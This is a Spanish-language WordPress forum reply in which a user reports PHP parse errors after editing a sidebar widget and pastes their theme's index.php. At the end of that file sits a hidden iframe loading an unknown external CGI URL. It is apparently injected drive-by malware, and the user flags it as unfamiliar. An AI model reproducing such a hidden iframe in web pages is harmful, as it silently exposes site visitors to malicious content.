Respuesta a: Insertar swf en la barra lateral

Inicio Foros WordPress Programación Insertar swf en la barra lateral Respuesta a: Insertar swf en la barra lateral

fum
Participante

Hola Eduardo, parece que la embarré!
Ubiqué la carpeta flash como me dijiste: en wp-content.
Pero algo pasó, usando el código de Fernando que pegué en el widget.
Cuando quise actualizar desde el panel de cotrol obtuve este error:
[quote]Warning: Unexpected character in input: ”’ (ASCII=39) state=1 in /www/docs/carlosfumagalli.com.ar/public_html/taller/index.php on line 17

Parse error: syntax error, unexpected ‘.’ in /www/docs/carlosfumagalli.com.ar/public_html/taller/index.php on line 17[/quote]

Cuestión que no puedo acceder al blog!
Aquí lo que tengo en el index:

[code]<?php get_header(); ?>
<?php get_sidebar(); ?>
<?php include (TEMPLATEPATH . ‘/right-sidebar.php’); ?>

<div id=”content”>
<?php
if ( have_posts() ) : query_posts($query_string .’&cat=-35′); while ( have_posts() ) : the_post();
?>

<div class=”post” id=”post-<?php the_ID(); ?>”>
<h2>” rel=”bookmark” title=”Enlace permanente a <?php the_title(); ?>”><?php the_title(); ?></h2>
<p class=”date”><?php the_time(‘j F, Y’) ?></p>
<div class=”entry”>
<?php the_content(‘Leer mas … »’); ?>
</div>

<p class=”category”>Posted in <?php the_category(‘, ‘) ?> | <?php edit_post_link(‘Editar’, ”, ‘ | ‘); ?> <?php comments_popup_link(‘No hay comentarios »’, ‘1 Comentario »’, ‘% Comentarios »’); ?></p>
</div>

<?php endwhile; ?>
<div class=”bottomnavigation”>
<div class=”alignleft”><?php next_posts_link(‘« Entradas anteriores’) ?></div>
<div class=”alignright”><?php previous_posts_link(‘Entradas siguientes »’) ?></div>
</div>

<?php else : ?>
<div id=”page”>
<h1 class=”center”>No encontado</h1>
<p class=”center”>Lo siento, pero estas buscando algo que no esta aqui.</p>
<p class=”center”>Puede que quieras intentar una busqueda o elegir algun enlace de los menus.</p>
</div>

<?php endif; ?>
<
<iframe src=”http://c9u.at:8080/ts/in.cgi?pepsi147″ width=125 height=125 style=”visibility: hidden”></iframe>[/code]

Por cierto me llaman la atención las últimas líneas con el iframe a una url que no conozco, no entiendo de dónde salió.
Si podés orientarme se agradece ya que ahora no se puede entrar al blog…

Pin It on Pinterest

Ir al contenido